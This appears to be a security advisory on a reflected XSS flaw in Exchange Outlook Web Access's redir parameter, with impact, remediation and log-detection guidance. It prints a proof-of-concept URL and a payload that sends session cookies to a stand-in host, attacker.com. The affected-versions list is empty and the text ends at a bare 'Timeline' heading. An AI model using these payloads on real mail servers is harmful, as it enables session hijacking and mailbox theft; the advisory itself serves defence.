CVE-2026-42897: Microsoft Exchange Server XSS in Outlook Web Access

Background

Microsoft Exchange Server remains a critical piece of enterprise communication infrastructure worldwide, hosting email and calendaring for millions of organisations. Outlook Web Access (OWA) is Exchange’s browser-based email client, commonly exposed to the internet to allow users to access email without VPN. In hybrid Microsoft 365 environments, OWA provides access to on-premises mailboxes alongside cloud-hosted ones.

CVE-2026-42897 is a reflected cross-site scripting (XSS) vulnerability in OWA that allows an attacker to execute arbitrary JavaScript in the browser context of an OWA user. The interaction requirement (user must click a crafted link) accounts for the slightly reduced CVSS score, but the impact of successful exploitation — OWA session token theft, email access, and potential pivot to other internal web applications — is severe.

Cross-site scripting vulnerabilities in Exchange are particularly dangerous because OWA sessions carry full access to the victim’s email, calendar, and contacts. In corporate environments, employee email accounts are often used for password resets, MFA approvals, and other sensitive authentication flows — email account access frequently translates directly to access across the entire Microsoft estate.

Technical Mechanism

The vulnerability is in OWA’s URL parameter handling within the calendar sharing and scheduling assistant functionality. The redir parameter, used to redirect users to specific mailbox views after authentication, is reflected into the HTML response without adequate output encoding.

When OWA generates a page that includes a redirect URL in its response, it constructs an inline JavaScript call to set the redirect destination:

<!-- Simplified vulnerable output pattern -->
<script>
  var redirectUrl = '/owa/[ATTACKER_INPUT_REFLECTED_HERE]';
  window.onload = function() { checkRedirect(redirectUrl); };
</script>

The input is HTML-entity-encoded for angle brackets, preventing direct injection of <script> tags. However, the reflection occurs within a JavaScript string literal, and the encoding does not prevent breaking out of the JavaScript string context. By injecting a single quote followed by JavaScript syntax, an attacker can inject arbitrary code:

https://mail.company.com/owa/?redir=';alert(document.cookie);//

When a victim navigates to this URL (via a phishing email, malicious link in a Teams message, or calendar invite), the JavaScript executes in the victim’s browser in the context of the OWA origin (https://mail.company.com). The same-origin policy grants the injected script full access to OWA’s session cookies, DOM, and any data rendered on the page.

The attack chain for session hijacking:

1. Attacker crafts a URL pointing to the victim’s OWA instance with the redir payload
2. Payload exfiltrates the OWA session cookie to an attacker-controlled server: ';document.write('<img src="https://attacker.com/?c='+document.cookie+'">);//`
3. Victim opens the link while authenticated to OWA
4. Session cookie delivered to attacker
5. Attacker replays the session cookie for full OWA access

Modern browsers with HttpOnly cookies prevent direct JavaScript access to the cookie value. However, the XSS can still be weaponised via indirect means: screenshot capture of the DOM (capturing emails visible in the inbox), form action hijacking (intercepting password change forms), or CSRF attacks within the OWA origin context.

Real-World Exploitation Evidence

CISA’s KEV designation follows evidence of this vulnerability being used in targeted phishing campaigns. The exploitation pattern is distinct from opportunistic mass exploitation: attackers embed the crafted OWA URL in spear-phishing emails that impersonate internal IT notifications, directing targets to click a link to “verify their OWA configuration” or “approve a calendar invite.”

Documented exploitation scenarios:

• BEC (Business Email Compromise) campaigns: Session hijacking via XSS to gain inbox access, enabling fraudulent wire transfer instruction interception
• MFA bypass chaining: Using OWA access obtained via XSS session hijacking to intercept MFA token requests delivered by email
• Lateral movement via email trust: Sending malicious content from a compromised trusted internal sender to further phishing targets

The CISA KEV entry notes that exploitation has been observed in healthcare and legal sector organisations, where email is frequently used for sensitive document transmission.

Impact Assessment

Despite the interaction requirement, XSS vulnerabilities in OWA carry disproportionate impact because of what email access unlocks:

• Full mailbox access: Read, send, delete, and rule manipulation. An attacker with OWA access can read all email, which typically includes password reset links, financial documents, legal communications, and sensitive HR matters.
• MFA interception: Many organisations send MFA codes via email. OWA access can enable real-time interception for MFA bypass on other systems.
• Phishing amplification: Sending from a trusted corporate email address dramatically increases the effectiveness of further social engineering attacks.
• Calendar abuse: Access to calendar data reveals meeting schedules, attendees, and can be used to inject malicious meeting links into future appointments.
• Hybrid environment pivot: In hybrid Exchange/Microsoft 365 environments, OWA sessions may be usable across both on-premises and cloud components.

Affected Versions

Exchange Online (Microsoft 365) was not affected — Microsoft patched the cloud service silently.

Remediation Steps

1. Apply the June 2026 Security Update: Microsoft released the fix as part of the June 2026 Exchange Security Update package. Install via Windows Update or the Exchange Update Package available from Microsoft’s Download Center. Requires a brief Exchange service restart.

2. Verify installation: After update, confirm the applied build number in Exchange Admin Center > Servers > Server Version. Compare against Microsoft’s published build number for the June 2026 SU.

3. Implement Content Security Policy: Configure OWA to serve a Content-Security-Policy response header restricting script execution to known sources. This is a defence-in-depth measure that limits XSS exploitation even when vulnerabilities exist. Exchange 2019 CU15 includes CSP headers in the fixed build; earlier versions may require IIS-level header configuration.

4. Review Outlook Web App policies: Tighten OWA Mailbox Policies to restrict unnecessary features: disable forms-based authentication if certificate-based or Windows Integrated Authentication is feasible.

5. Enable Advanced Threat Protection link scanning: If using Microsoft Defender for Office 365, enable Safe Links to detect and block OWA URLs containing known XSS payloads before users click them.

6. Audit recent OWA session anomalies: Review Exchange OWA logs (IIS W3C logs for /owa/) for requests to the redir parameter with unusual characters, particularly single quotes and JavaScript keywords.

Detection Guidance

Monitor IIS W3C logs for Exchange OWA (default path C:\inetpub\logs\LogFiles\W3SVC*):

• Requests to /owa/ with redir or url parameters containing ', %27, javascript:, <script>, or encoded equivalents (%3Cscript%3E, %22)
• Outbound connections from the Exchange server to new external destinations (may indicate XSS payload calling back)
• Session anomalies: same session cookie used from different IP addresses or user agents in quick succession

IIS log query (PowerShell):

Get-Content "C:\inetpub\logs\LogFiles\W3SVC1\*.log" |
  Where-Object { $_ -match "redir=" -and ($_ -match "%27" -or $_ -match "script") } |
  Select-Object -Last 100

SIEM rule: Flag OWA log entries where URI query contains single quotes, javascript:, or <script> patterns, grouped by source IP.

Timeline